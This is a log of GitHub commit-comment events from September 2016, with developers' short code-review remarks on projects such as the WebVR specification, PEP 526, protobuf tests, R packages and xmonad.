{"id":"4504973505","type":"CommitCommentEvent","actor":{"login":"DigiTec"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18870256,"position":269,"line":459,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-01T20:38:02Z","updated_at":"2016-09-01T20:38:02Z","body":"Devices seem to have a mixture of either a frameId or an absolute timestamp (which tends to not be nanosecond/microsecond resolution as per DOMHighResTimeStamp. This may be an invalid usage of the type."}},"created_at":"2016-09-01T20:38:02Z"}
{"id":"4504975677","type":"CommitCommentEvent","actor":{"login":"stefan-j"},"repo":{"name":"stefan-j/codeworld"},"payload":{"comment":{"id":18870262,"position":9,"line":173,"path":"funblocks-client/src/Blocks/Parser.hs","commit_id":"8b2bc93aed15ef99a4802f5b2afd38b9511e485e","created_at":"2016-09-01T20:38:25Z","updated_at":"2016-09-01T20:38:25Z","body":"That's true. I didn't think of it."}},"created_at":"2016-09-01T20:38:25Z"}
{"id":"4504977195","type":"CommitCommentEvent","actor":{"login":"universam1"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18870267,"position":null,"line":null,"path":null,"commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T20:38:43Z","updated_at":"2016-09-01T20:38:43Z","body":"Yes I do agree, compatibility is the goal although I really would like to be able to configure on the field... :(\r\n\r\nBtw. I was able to get a Taranis flashed. But my sniffing was odd, the sync is 0xA7 but not 0x55... On the other hand, for the UART there is no difference whether 8e2 or 8e1 is configured. Could be working then"}},"created_at":"2016-09-01T20:38:43Z"}
{"id":"4504983375","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18870277,"position":null,"line":null,"path":null,"commit_id":"e288ba8cd89af5b5cc0b40bd2415f7dd5674b0c8","created_at":"2016-09-01T20:39:52Z","updated_at":"2016-09-01T20:39:52Z","body":"@MichaelWallace30 \r\nthe whole stack thing with the packing and unpacking of ObjectStream is a bit confusing. \r\n\r\nIt works this way: when you pack:\r\n```C++\r\nobj << data1;\r\nobj << data2;\r\nobj << data3;\r\n```\r\n\r\nwhen you unpack:\r\nit must work backwards:\r\n```C++\r\nobj >> data3;\r\nobj >> data2;\r\nobj >> data1;\r\n```\r\nKind of like a stack (when you pack, you are pushing in, when you unpack, you are poping out."}},"created_at":"2016-09-01T20:39:52Z"}
{"id":"4504986838","type":"CommitCommentEvent","actor":{"login":"Extreme112"},"repo":{"name":"Extreme112/monopv1"},"payload":{"comment":{"id":18870284,"position":null,"line":null,"path":null,"commit_id":"c56de9c55e9a558d7e01be71b1983afb014e9eb2","created_at":"2016-09-01T20:40:31Z","updated_at":"2016-09-01T20:40:31Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Ez978wBs&#x2F;14-mortgage-not-setting-owner-to-none\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Mortgage not setting owner to &quot;none&quot; .</a>"}},"created_at":"2016-09-01T20:40:31Z"}
{"id":"4504989161","type":"CommitCommentEvent","actor":{"login":"moacyrricardo"},"repo":{"name":"quintoandar/frontend-components"},"payload":{"comment":{"id":18870290,"position":6,"line":276,"path":"qa-search/v2/qa-search.html","commit_id":"ea5bb0bf99fb80500d80698fbfc98f5ad061ab5d","created_at":"2016-09-01T20:40:58Z","updated_at":"2016-09-01T20:40:58Z","body":"@makall talvez precise 'guardar' o request e cancelar quando um novo debounce acontece, não?\r\n"}},"created_at":"2016-09-01T20:40:58Z"}
{"id":"4504989865","type":"CommitCommentEvent","actor":{"login":"bonattt"},"repo":{"name":"bonattt/RHAwebsite"},"payload":{"comment":{"id":18870293,"position":null,"line":null,"path":null,"commit_id":"05eaeace28264610d54b2f4284cf152e89f2691c","created_at":"2016-09-01T20:41:06Z","updated_at":"2016-09-01T20:41:06Z","body":"initial commit"}},"created_at":"2016-09-01T20:41:06Z"}
{"id":"4504993935","type":"CommitCommentEvent","actor":{"login":"makall"},"repo":{"name":"quintoandar/frontend-components"},"payload":{"comment":{"id":18870302,"position":6,"line":276,"path":"qa-search/v2/qa-search.html","commit_id":"ea5bb0bf99fb80500d80698fbfc98f5ad061ab5d","created_at":"2016-09-01T20:41:52Z","updated_at":"2016-09-01T20:41:52Z","body":"nope, ele cancela internamente... senão não teria graça né?\r\n"}},"created_at":"2016-09-01T20:41:52Z"}
{"id":"4504995581","type":"CommitCommentEvent","actor":{"login":"gvanrossum"},"repo":{"name":"phouse512/peps"},"payload":{"comment":{"id":18870305,"position":24,"line":267,"path":"pep-0526.txt","commit_id":"e3560bb3e7b77b774f4befe2debbc41546d3b04f","created_at":"2016-09-01T20:42:12Z","updated_at":"2016-09-01T20:42:12Z","body":"Disagree -- \"annotates\" refers to any type annotation syntax; what's stored in `__annotations__` is more limited."}},"created_at":"2016-09-01T20:42:12Z"}
{"id":"4504999711","type":"CommitCommentEvent","actor":{"login":"gvanrossum"},"repo":{"name":"phouse512/peps"},"payload":{"comment":{"id":18870314,"position":null,"line":null,"path":null,"commit_id":"e3560bb3e7b77b774f4befe2debbc41546d3b04f","created_at":"2016-09-01T20:42:59Z","updated_at":"2016-09-01T20:42:59Z","body":"BTW I made some changes to the master peps repo. Can you incorporate those so they don't get lost?"}},"created_at":"2016-09-01T20:42:59Z"}
{"id":"4505001422","type":"CommitCommentEvent","actor":{"login":"ekyl"},"repo":{"name":"mvhs-apcs/methods2"},"payload":{"comment":{"id":18870317,"position":null,"line":null,"path":null,"commit_id":"3053bf17d8e5d4e1c3a5e9f94d8ed08dc1d481c8","created_at":"2016-09-01T20:43:21Z","updated_at":"2016-09-01T20:43:21Z","body":"ayy lmao"}},"created_at":"2016-09-01T20:43:21Z"}
{"id":"4505002340","type":"CommitCommentEvent","actor":{"login":"Extreme112"},"repo":{"name":"Extreme112/monopv1"},"payload":{"comment":{"id":18870320,"position":null,"line":null,"path":null,"commit_id":"fda164fe7e7296fb0e2a1115be4f475adb40689e","created_at":"2016-09-01T20:43:30Z","updated_at":"2016-09-01T20:43:30Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;6kUopeAF&#x2F;13-change-cash-font\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Change cash font.</a>"}},"created_at":"2016-09-01T20:43:30Z"}
{"id":"4505005574","type":"CommitCommentEvent","actor":{"login":"djalova"},"repo":{"name":"SparkTC/stocator"},"payload":{"comment":{"id":18870325,"position":40,"line":40,"path":"src/main/java/com/ibm/stocator/fs/swift/http/SwiftConnectionManager.java","commit_id":"1d513d66f137990abcaabb404abc53dc996e8f91","created_at":"2016-09-01T20:44:07Z","updated_at":"2016-09-01T20:44:07Z","body":"Is it ok to retry this much? Or should we just let it fail sooner?"}},"created_at":"2016-09-01T20:44:07Z"}
{"id":"4505006420","type":"CommitCommentEvent","actor":{"login":"kliewkliew"},"repo":{"name":"apache/phoenix"},"payload":{"comment":{"id":18870326,"position":null,"line":null,"path":null,"commit_id":"06d37e534d1e07e8206eaefb82dd7bf3f50455b0","created_at":"2016-09-01T20:44:16Z","updated_at":"2016-09-01T20:44:16Z","body":"fixes #201 "}},"created_at":"2016-09-01T20:44:16Z"}
{"id":"4505007509","type":"CommitCommentEvent","actor":{"login":"vhkrausser"},"repo":{"name":"weisebrazil/jenkins-pipeline"},"payload":{"comment":{"id":18870330,"position":null,"line":null,"path":null,"commit_id":"5b389d6f2ec7be27a75cdcc61e6bac78736b7f6f","created_at":"2016-09-01T20:44:28Z","updated_at":"2016-09-01T20:44:28Z","body":"why this name to the poor commit :cry: "}},"created_at":"2016-09-01T20:44:28Z"}
{"id":"4505007579","type":"CommitCommentEvent","actor":{"login":"gvanrossum"},"repo":{"name":"phouse512/peps"},"payload":{"comment":{"id":18870331,"position":null,"line":null,"path":null,"commit_id":"e3560bb3e7b77b774f4befe2debbc41546d3b04f","created_at":"2016-09-01T20:44:29Z","updated_at":"2016-09-01T20:44:29Z","body":"Also (perhaps for a separate pass) there are several places where we talk about class annotations and instance annotations, I think those should switch to class variables and instance variables (I just explained the difference on python-dev: https://mail.python.org/pipermail/python-dev/2016-September/146044.html"}},"created_at":"2016-09-01T20:44:29Z"}
{"id":"4505007902","type":"CommitCommentEvent","actor":{"login":"thebearingedge"},"repo":{"name":"carsony/project-youtube"},"payload":{"comment":{"id":18870333,"position":12,"line":12,"path":"index.html","commit_id":"0fc7050134b4b49b501c31261559d2a8273d8f15","created_at":"2016-09-01T20:44:33Z","updated_at":"2016-09-01T20:44:33Z","body":"Hi Carson, you can set a placeholder on input elements:\r\n```html\r\n<input type=\"text\" placeholder=\"Please enter item or description.\" id=\"entry\">\r\n```\r\nThis way, the user does not have to delete the value that is already in the input."}},"created_at":"2016-09-01T20:44:33Z"}
{"id":"4505009913","type":"CommitCommentEvent","actor":{"login":"vhkrausser"},"repo":{"name":"weisebrazil/jenkins-pipeline"},"payload":{"comment":{"id":18870340,"position":null,"line":null,"path":null,"commit_id":"1e51b21d27cc061e95d56d4a2dafa90006437d9a","created_at":"2016-09-01T20:44:55Z","updated_at":"2016-09-01T20:44:55Z","body":"why u so angry?"}},"created_at":"2016-09-01T20:44:55Z"}
{"id":"4505012389","type":"CommitCommentEvent","actor":{"login":"charsleysa"},"repo":{"name":"auth0/angular2-jwt"},"payload":{"comment":{"id":18870345,"position":24,"line":228,"path":"angular2-jwt.ts","commit_id":"4e85b828b36b322482c2a4e8e46e58172016adcc","created_at":"2016-09-01T20:45:22Z","updated_at":"2016-09-01T20:45:22Z","body":"A non-constant value is used for this check. This can lead to false positives. "}},"created_at":"2016-09-01T20:45:22Z"}
{"id":"4505023375","type":"CommitCommentEvent","actor":{"login":"bmcutler"},"repo":{"name":"Submitty/Submitty"},"payload":{"comment":{"id":18870367,"position":null,"line":null,"path":null,"commit_id":"5c6e64a5098720e3d6d5c5e12dd5d40afcd3286d","created_at":"2016-09-01T20:47:20Z","updated_at":"2016-09-01T20:47:20Z","body":"This fixes an urgent bug, but I'm not sure why. \r\n@masterodin, please explain where the course & semester variables are getting added to the URL.\r\nAnd why having two copies doesn't work for the view all sections, but two copies does work for view your section."}},"created_at":"2016-09-01T20:47:20Z"}
{"id":"4505023468","type":"CommitCommentEvent","actor":{"login":"crumdidlyumshis"},"repo":{"name":"ElvUI-WotLK/ElvUI"},"payload":{"comment":{"id":18870368,"position":7,"line":24,"path":"ElvUI/modules/skins/blizzard/friends.lua","commit_id":"c0a2a46793c740061530013b049e357ba7d75a8f","created_at":"2016-09-01T20:47:21Z","updated_at":"2016-09-01T20:47:21Z","body":"Maybe add?\r\n\r\n`\tFriendsFrameStatusDropDown:Point(\"TOPLEFT\", FreindsListFrame, \"TOPLEFT\", 13, -44);\r\n\tFriendsFrameBroadcastInput:SetWidth(150);\r\n\tFriendsFrameBroadcastInput:SetHeight(20);\r\n\tFriendsFrameBroadcastInput:Point(\"TOPLEFT\", FriendsFrameStatusDropDown, \"TOPRIGHT\", 13, -2);`\r\n\r\n![wowscrnshot_090116_154634](https://cloud.githubusercontent.com/assets/7307335/18183731/5dafa332-705b-11e6-9469-9e8aa97c8ab1.jpg)\r\n"}},"created_at":"2016-09-01T20:47:21Z"}
{"id":"4505024888","type":"CommitCommentEvent","actor":{"login":"saiema"},"repo":{"name":"nmaguirre/minesweeper"},"payload":{"comment":{"id":18870371,"position":null,"line":null,"path":null,"commit_id":"4051413422a50bb84cfd47d12793406dda7d1635","created_at":"2016-09-01T20:47:36Z","updated_at":"2016-09-01T20:47:36Z","body":"Wrong commit comment. The commit message refers to MinesweeperBoard but the changes affects MinesweeperGameState."}},"created_at":"2016-09-01T20:47:36Z"}
{"id":"4505024897","type":"CommitCommentEvent","actor":{"login":"mfraezz"},"repo":{"name":"CenterForOpenScience/osf.io"},"payload":{"comment":{"id":18870372,"position":5,"line":3240,"path":"website/project/model.py","commit_id":"cf68848c0cba14288104186163d1f36d532b61b1","created_at":"2016-09-01T20:47:36Z","updated_at":"2016-09-01T20:47:36Z","body":">to change add contributors\r\n\r\nThe word \"change\" should probably be removed -- the `if contrib_to_add not in self.contributors` conditional above ensure that this is an addition. On a related note, should `auth` be checked for the `elif contrib_to_add in self.contributors and permissions is not None` block as well?"}},"created_at":"2016-09-01T20:47:36Z"}
{"id":"4505025322","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18870375,"position":33,"line":36,"path":"R/cut.integer.R","commit_id":"4620a7ec43c9844753d92a34e7f9c5cda560ec5f","created_at":"2016-09-01T20:47:41Z","updated_at":"2016-09-01T20:47:41Z","body":"I see you are doing some assertive test here. I think we should probably do that for all input in a section at the top so we don't have to bother in the main body of the function anymore.\r\n"}},"created_at":"2016-09-01T20:47:41Z"}
{"id":"4505034729","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"quozl/cforth-1"},"payload":{"comment":{"id":18870393,"position":null,"line":null,"path":null,"commit_id":"dedba89249bd4a1f5695d9c037f827ab4c5fdefc","created_at":"2016-09-01T20:49:11Z","updated_at":"2016-09-01T20:49:11Z","body":"So `: x 'x' ;` is decompiled as `: x $78 ;`, and it isn't clear that it could be any better, because there's no distinguishing feature in the definition.\r\n\r\nCan change decompiler thus;\r\n```\r\n: .char    ( ip -- ip' )\r\n   ..\" '\"  ta1+  dup @ emit  ..\" '\" space  na1+\r\n;\r\n```\r\n\r\nBut that decompiles `[char] x` into `'x'`, misrepresenting the definition.\r\n\r\nAlternatives might be;\r\n* change input number conversion to store the input syntax, (shudder),\r\n* replace `[char] z` with `'z'` across the tree,"}},"created_at":"2016-09-01T20:49:11Z"}
{"id":"4505038341","type":"CommitCommentEvent","actor":{"login":"DigiTec"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18870402,"position":299,"line":489,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-01T20:49:50Z","updated_at":"2016-09-01T20:49:50Z","body":"Can we describe that this is a value representing the combination of the pose of the headset and the additional transformation from the headsets pose to the eye location? That way people know what is in this view matrix. We may also want to point out that this value is only the relative view matrix and in some cases still needs to be multiplied by the observers absolute location."}},"created_at":"2016-09-01T20:49:50Z"}
{"id":"4505038767","type":"CommitCommentEvent","actor":{"login":"octref"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18870403,"position":null,"line":null,"path":null,"commit_id":"152e0b04a7a2de37358da53287cbad346c0182b8","created_at":"2016-09-01T20:49:54Z","updated_at":"2016-09-01T20:49:54Z","body":"@alexandrudima \r\n\r\nJust wondering, is it by design that we don't include `lighter`, `inherit`, etc?\r\n\r\nHere is the `fontWeight` prompt for Chrome DevTools:\r\n\r\n![image](https://cloud.githubusercontent.com/assets/4033249/18183806/f285c68c-704a-11e6-8331-581272884341.png)\r\n"}},"created_at":"2016-09-01T20:49:54Z"}
{"id":"4505038839","type":"CommitCommentEvent","actor":{"login":"watou"},"repo":{"name":"eclipse/smarthome"},"payload":{"comment":{"id":18870404,"position":16,"line":78,"path":"extensions/persistence/org.eclipse.smarthome.persistence.h2/src/main/java/org/eclipse/smarthome/persistence/h2/internal/H2PersistenceService.java","commit_id":"595c311db36e6e16502d4f548bd6c199a3528435","created_at":"2016-09-01T20:49:55Z","updated_at":"2016-09-01T20:49:55Z","body":"A new database schema would allow all states to be persisted.  For example:\r\n\r\n\r\nUnDefStates\r\n- timestamp\r\n- item name\r\n- value (smallest SQL type to hold UNDEF vs. NULL)\r\n\r\nDecimalStates\r\n- timestamp\r\n- item name\r\n- value ([decimal-type](http://www.h2database.com/html/datatypes.html#decimal_type))\r\n\r\nStringStates\r\n- timestamp\r\n- item name\r\n- value (VARCHAR(...))\r\n\r\netc.  Insert into the correct table based on State.class.\r\n\r\nQuery with a UNION across all the state types you are interested in.  Charts might only want to query for rows in the DecimalStates table, while some other client that wants all state changes would UNION in the UnDefStates and possible other tables.\r\n"}},"created_at":"2016-09-01T20:49:55Z"}
{"id":"4505044284","type":"CommitCommentEvent","actor":{"login":"wolf31o2"},"repo":{"name":"caskdata/cdap"},"payload":{"comment":{"id":18870419,"position":null,"line":null,"path":null,"commit_id":"ac9ff2a8cafd932252c7ee529592e79855667faa","created_at":"2016-09-01T20:50:57Z","updated_at":"2016-09-01T20:50:57Z","body":"If you move this entire execution under the `exec-maven-plugin` plugin section (next section) and before the `clean-bower-components` execution, it should work. Basically, cut 167-179 and paste it after 186."}},"created_at":"2016-09-01T20:50:57Z"}
{"id":"4505048315","type":"CommitCommentEvent","actor":{"login":"mohamedfci2015"},"repo":{"name":"maya70/SCU"},"payload":{"comment":{"id":18870423,"position":null,"line":null,"path":null,"commit_id":"0e344fb2ab7b3e66e10c181fc9fda327aee38488","created_at":"2016-09-01T20:51:42Z","updated_at":"2016-09-01T20:51:42Z","body":"ahmed hegazy updates"}},"created_at":"2016-09-01T20:51:42Z"}
{"id":"4505048888","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18870427,"position":null,"line":null,"path":null,"commit_id":"e288ba8cd89af5b5cc0b40bd2415f7dd5674b0c8","created_at":"2016-09-01T20:51:48Z","updated_at":"2016-09-01T20:51:48Z","body":"I'm 99% thats the way it works. Does it not work that way?\r\n"}},"created_at":"2016-09-01T20:51:48Z"}
{"id":"4505049067","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18870428,"position":33,"line":36,"path":"R/cut.integer.R","commit_id":"4620a7ec43c9844753d92a34e7f9c5cda560ec5f","created_at":"2016-09-01T20:51:51Z","updated_at":"2016-09-01T20:51:51Z","body":"Yes I agree - we should probably use the [assertive](https://cran.r-project.org/web/packages/assertive/index.html) package for this. I kinda just put it in the code body as a temporary measure."}},"created_at":"2016-09-01T20:51:51Z"}
{"id":"4505057259","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"paulhendricks/functools"},"payload":{"comment":{"id":18870445,"position":null,"line":null,"path":null,"commit_id":"f106add0a5cb5363c79d72436f66b79e23ff1f88","created_at":"2016-09-01T20:53:23Z","updated_at":"2016-09-01T20:53:23Z","body":"[R/Truthy.R:22:10:](https://github.com/paulhendricks/functools/blob/f106add0a5cb5363c79d72436f66b79e23ff1f88/R/Truthy.R#L22) *warning:* **no visible global function definition for ‘Existy’, Did you mean 'exists'?**\n```r\n​  return(Existy(.x) && identical(.x, True()))\n         ^~~~~~\n```\n[R/Truthy.R:22:38:](https://github.com/paulhendricks/functools/blob/f106add0a5cb5363c79d72436f66b79e23ff1f88/R/Truthy.R#L22) *warning:* **no visible global function definition for ‘True’, Did you mean 'rug'?**\n```r\n​  return(Existy(.x) && identical(.x, True()))\n                                     ^~~~\n```"}},"created_at":"2016-09-01T20:53:23Z"}
{"id":"4505062635","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18870457,"position":27,"line":30,"path":"R/cut.integer.R","commit_id":"4620a7ec43c9844753d92a34e7f9c5cda560ec5f","created_at":"2016-09-01T20:54:23Z","updated_at":"2016-09-01T20:54:23Z","body":"sorry to comment so much here but I think to follow a consistent style, we should try to avoid using `=` as assignment operator (http://adv-r.had.co.nz/Style.html). \r\nIn addition, it seems that you like camelCase variable names, so let's stick to that, apart from the argument labels such as breaks.mode (which is consistent with most of the arguments of cut, but not ordered_result...).\r\n"}},"created_at":"2016-09-01T20:54:23Z"}
{"id":"4505063019","type":"CommitCommentEvent","actor":{"login":"DigiTec"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18870458,"position":335,"line":536,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-01T20:54:28Z","updated_at":"2016-09-01T20:54:28Z","body":"Are there any decorations we can do to tag these with any sort of \"deprecated\" tag? Reading into the prose often takes a while before you the the, \"Don't use this\" clauses."}},"created_at":"2016-09-01T20:54:28Z"}
{"id":"4505063206","type":"CommitCommentEvent","actor":{"login":"rikvdkleij"},"repo":{"name":"rikvdkleij/intellij-haskell"},"payload":{"comment":{"id":18870459,"position":null,"line":null,"path":null,"commit_id":"b9c77924a07d22162e931590d0cf9d464a8373f7","created_at":"2016-09-01T20:54:30Z","updated_at":"2016-09-01T20:54:30Z","body":"Yeah, it's complete rewrite which depends on stack repl and intero"}},"created_at":"2016-09-01T20:54:30Z"}
{"id":"4505065081","type":"CommitCommentEvent","actor":{"login":"rafaelverger"},"repo":{"name":"jusbrasil/react-portal"},"payload":{"comment":{"id":18870466,"position":37,"line":172,"path":"lib/portal.js","commit_id":"24e5469cf7e277f66f6c4533ad7cd95ba0cf6b4b","created_at":"2016-09-01T20:54:50Z","updated_at":"2016-09-01T20:54:50Z","body":"`return document.querySelector(targetSelector) || document.body`"}},"created_at":"2016-09-01T20:54:50Z"}
{"id":"4505069861","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18870476,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T20:55:41Z","updated_at":"2016-09-01T20:55:41Z","body":"@f1u77y What I had in mind is moving strutMap to extensible state, wrapped in Maybe to tell if the initial queryTree must be done. Then, UpdateDock/RemoveDock handling (which I think just updates the strutMap) could be done directly in docksEventHook, followed by a simple message that tells AvoidStruts that strutMap has changed (if it actually has). Do you think something like this could work?\r\n\r\nFor some reason the current code does call getRawStruts in modifyLayoutWithUpdate sometimes and that's probably expensive, too. I think that this might not be necessary if all PropertyEvents are handled by the event hook and stored in the global strutMap. Whether this is possible or if there's a possibility of not receiving some property changes due to selectInput being called in manageDocks is unfortunately beyond my X knowledge.\r\n\r\nFinally, now that I've been forced to read most of ManageHooks.hs, I think I won't mind if the startup hook stays (as long as it's not required to run it anywhere else than in the actual xmonad startupHook). There's 3 things a user has to add already, so it's probably a good idea to do something like this: https://github.com/xmonad/xmonad-contrib/blob/e41d7135a9fab6675f538cf8220d398f0c96305f/XMonad/Hooks/EwmhDesktops.hs#L55, and then it becomes just an implementation detail, not something a user has to deal with (unless they are upgrading from an older version, which will happen sooner or later, sadly).\r\n\r\n(And, unfortunately, I too should now switch to other things. I have a work deadline tomorrow and I'll be offline until Monday.)"}},"created_at":"2016-09-01T20:55:41Z"}
{"id":"4505071844","type":"CommitCommentEvent","actor":{"login":"Superbil"},"repo":{"name":"lowiki-org/localwiki-backend-server"},"payload":{"comment":{"id":18870485,"position":null,"line":null,"path":null,"commit_id":"34104aece9612d2ce944200fffc1014b2eadd0a4","created_at":"2016-09-01T20:56:02Z","updated_at":"2016-09-01T20:56:02Z","body":"之前試著轉成 wikitext 存但是沒成功，這個部份我再修正"}},"created_at":"2016-09-01T20:56:02Z"}
{"id":"4505076106","type":"CommitCommentEvent","actor":{"login":"DigiTec"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18870513,"position":346,"line":574,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-01T20:56:47Z","updated_at":"2016-09-01T20:56:47Z","body":"Refer to VRFrameData instead of getPose here? Note that both eyes will need to be transformed?"}},"created_at":"2016-09-01T20:56:47Z"}
{"id":"4505076382","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870517,"position":21,"line":59,"path":"objectivec/Tests/GPBMessageTests+Runtime.m","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T20:56:50Z","updated_at":"2016-09-01T20:56:50Z","body":"that way when they are referenced here it will be the first use and initialization will take place now."}},"created_at":"2016-09-01T20:56:50Z"}
{"id":"4505076827","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870519,"position":15,"line":53,"path":"objectivec/Tests/GPBMessageTests+Runtime.m","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T20:56:55Z","updated_at":"2016-09-01T20:56:55Z","body":"tricky"}},"created_at":"2016-09-01T20:56:55Z"}
{"id":"4505078471","type":"CommitCommentEvent","actor":{"login":"weierophinney"},"repo":{"name":"zendframework/zend-expressive-skeleton"},"payload":{"comment":{"id":18870523,"position":12,"line":16,"path":"CHANGELOG.md","commit_id":"cb92a5761ca1726eb858c9b58deac7ec85c3a8ec","created_at":"2016-09-01T20:57:14Z","updated_at":"2016-09-01T20:57:14Z","body":"Fixed, thanks!"}},"created_at":"2016-09-01T20:57:14Z"}
{"id":"4505079647","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":18870525,"position":60,"line":60,"path":"docs/release_guide_automated.md","commit_id":"816020ffbdc5c282fb1767d4bbc40664ac7c182c","created_at":"2016-09-01T20:57:27Z","updated_at":"2016-09-01T20:57:27Z","body":"Thanks, the `release. Remind` should be `release, remind`. I'll fix it the next time I update it."}},"created_at":"2016-09-01T20:57:27Z"}
{"id":"4505081894","type":"CommitCommentEvent","actor":{"login":"cPanelChrisD"},"repo":{"name":"cPanelSSP/SSP"},"payload":{"comment":{"id":18870533,"position":null,"line":null,"path":null,"commit_id":"e400a854b19a9261e9ebd448aa724fd67eaff15b","created_at":"2016-09-01T20:57:52Z","updated_at":"2016-09-01T20:57:52Z","body":"This fixed an issue introduced while implementing TECH-128."}},"created_at":"2016-09-01T20:57:52Z"}
{"id":"4505082478","type":"CommitCommentEvent","actor":{"login":"toji"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18870535,"position":335,"line":536,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-01T20:57:58Z","updated_at":"2016-09-01T20:57:58Z","body":"I was looking for one but didn't see it. Need to scrub through the bikeshed docs some more.\r\n\r\nIn this case, though I don't think we actually want to deprecate this value. It's still very useful for frustum culling! (Especially since similar values will be hard to derive from an arbitrary projection matrix.) We simply want to make sure devs understand that they shouldn't be creating projections with it. (I should hope that most people would prefer to use the pre-built matrix anyway rather than doing more of their own math.)"}},"created_at":"2016-09-01T20:57:58Z"}
{"id":"4505086916","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18870545,"position":null,"line":null,"path":null,"commit_id":"e288ba8cd89af5b5cc0b40bd2415f7dd5674b0c8","created_at":"2016-09-01T20:58:46Z","updated_at":"2016-09-01T20:58:46Z","body":"Did you want me to change it? This was the intended design. I just tested it and this is the correct behavior."}},"created_at":"2016-09-01T20:58:46Z"}
{"id":"4505090087","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870562,"position":39,"line":39,"path":"objectivec/Tests/unittest_extension_chain_d.proto","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T20:59:18Z","updated_at":"2016-09-01T20:59:18Z","body":"b and c?"}},"created_at":"2016-09-01T20:59:18Z"}
{"id":"4505090920","type":"CommitCommentEvent","actor":{"login":"DigiTec"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18870564,"position":355,"line":714,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-01T20:59:26Z","updated_at":"2016-09-01T20:59:26Z","body":"These statements are really terrible. There is pretty much no way to comfortably render \"trusted\" UI over all possible types of user specified content. You end up with craziness like objects at 2 meters rendered behind an object that is showing a 3.5m to display a \"trusted\" UX because of the way you have to composite.\r\n\r\nI'd recommend removing any statements here that we aren't confident in, since they are leading statements and make people arrive at incorrect conclusions."}},"created_at":"2016-09-01T20:59:26Z"}
{"id":"4505090969","type":"CommitCommentEvent","actor":{"login":"zachariasmaladroit"},"repo":{"name":"Sony-Kitakami/android_kernel_sony"},"payload":{"comment":{"id":18870565,"position":null,"line":null,"path":null,"commit_id":"e6214f9c08b0a78316e1267e72e90220e7153aac","created_at":"2016-09-01T20:59:27Z","updated_at":"2016-09-01T20:59:27Z","body":"This one is the opensourced exfat (nofuse) driver, \r\n\r\nso legally we're good to go :)"}},"created_at":"2016-09-01T20:59:27Z"}
{"id":"4505093060","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":18870568,"position":39,"line":39,"path":"objectivec/Tests/unittest_extension_chain_f.proto","commit_id":"58af83650bce2bad941f7f02243e069b385fb37b","created_at":"2016-09-01T20:59:51Z","updated_at":"2016-09-01T20:59:51Z","body":"C is not used here"}},"created_at":"2016-09-01T20:59:51Z"}
{"id":"4505094562","type":"CommitCommentEvent","actor":{"login":"crumdidlyumshis"},"repo":{"name":"ElvUI-WotLK/ElvUI"},"payload":{"comment":{"id":18870574,"position":null,"line":null,"path":null,"commit_id":"a0625e5229a59b46b6496f82c03dcd4f4283aea9","created_at":"2016-09-01T21:00:08Z","updated_at":"2016-09-01T21:00:08Z","body":"Sorry! I don't know why I put 150;\r\n\r\nChange to:\r\n\r\nFriendsFrameBroadcastInput:Width(224);"}},"created_at":"2016-09-01T21:00:08Z"}
